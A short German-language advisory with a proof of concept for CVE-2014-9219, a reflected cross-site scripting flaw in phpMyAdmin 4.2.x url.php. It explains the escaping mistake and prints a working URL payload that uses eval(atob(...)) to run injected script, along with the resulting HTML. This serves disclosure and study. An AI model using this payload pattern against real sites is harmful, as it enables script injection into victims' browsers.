
CVE-2014-9219 XSS POC
CVE-2014-9219 XSS POC
Die Schwachstelle wird durch einen Fehler bei der Eingabevalidierung in der Weiterleitungsfunktion in url.php in phpMyAdmin 4.2.x vor 4.2.13.1 verursacht, wenn der URL-Parameter verarbeitet wird. Ein entfernter Angreifer kann das Opfer dazu verleiten, einem speziell präparierten Link zu folgen, und beliebigen HTML- und Skriptcode im Browser des Opfers im Sicherheitskontext der verwundbaren Website ausführen.
phpMyAdmin: 4.2.0 - 4.2.13
Der anfällige Code verwendet htmlspecialchars(), um den URL-Parameter zu bereinigen, bevor er in einen JavaScript-String-Kontext eingefügt wird:
window.location='" . htmlspecialchars($_GET['url']) . "';
htmlspecialchars() ist für den HTML-Kontext ausgelegt, nicht für den JavaScript-String-Kontext. Zeichen, die aus JavaScript-String-Literalen ausbrechen können, werden nicht ausreichend escaped.
URL-kodiert:
url.php?url=http%3A%2F%2Fwww.phpmyadmin.net%2F'%2beval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))%2b'
URL-dekodiert:
url.php?url=http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'
HTML-Ausgabe:
<script type='text/javascript'>
window.onload=function(){
window.location='http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'';
}
</script>Taking you to http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'.